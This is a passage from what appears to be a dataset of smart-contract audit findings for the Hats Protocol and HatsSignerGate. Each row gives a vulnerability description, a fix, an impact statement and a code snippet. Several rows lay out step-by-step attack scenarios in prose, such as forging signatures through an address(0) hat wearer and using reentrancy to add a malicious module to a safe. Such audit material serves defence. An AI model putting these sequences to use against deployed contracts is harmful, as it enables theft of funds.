0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n" +[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`,medium,"`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. 
(4) In this case, while the number of `validSignerCount` increased, the `_removeSigner` reduces it by one.",Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n,"This can cause the `signerCount` and safe `threshold` to update incorrectly, which can cause further problems, such as an incorrect number of signatures needed.",```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n +"Safe threshold can be set above target threshold, causing transactions to revert",medium,"If a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`.
This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the `validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. 
This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.",Edit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = 
target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\n,"A simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.",```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n +"If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked",medium,"`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. 
If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.","The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] 
memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n","If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.","```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n" +"If a hat is owned by address(0), phony signatures will be accepted by the safe",medium,"If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. 
See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. 
However, the result would be a free signer on the multisig, which would have dramatic consequences.",The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.,"If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.","```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n" +Swap Signer fails if final owner is invalid due to off by one error in loop,medium,"New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. 
If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.",Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < 
_ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n,"When only the final owner is invalid, new users will not be able to claim their role as signer, even though they should.","```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n" +"targetThreshold can be set below minThreshold, violating important invariant",medium,"There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all transactions to fail.",Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction
_setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n,"Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.",```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n +Hats can be overwritten,medium,"Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. 
This attack can be carried out by any hat wearer on their child tree, mutating their properties.","Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, ""Admin not created"")\\n```\\n",,"```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n" +"Unlinked tophat retains linkedTreeRequests, can be rugged",high,"When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. 
However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to ""takeover"" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a ""request"" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. 
Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission","In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n","Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.","```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n 
linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n" +Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold,high,"The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. 
If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.","Change the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n","All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which requires reducing the number of valid signers and may not always be possible.",```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n +Signers can bypass checks to add new modules to a safe by abusing reentrancy,high,"The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. 
This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the hash of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Dysfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. 
It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass","Use a more typical reentrancy guard format, such as checking to ensure 
`_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.",Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.,"```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +"If another module adds a module, the safe will be bricked",high,"If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the ""before"" check uses `enabledModuleCount` and the ""after"" check uses `enabledModuleCount + 1`. 
The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the ""before"" check would clip off the final modules, and the ""after"" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the ""before"" and ""after"" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.","The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.","The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.","```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +Signers can brick safe by adding unlimited additional signers while avoiding checks,high,"There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. 
This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. 
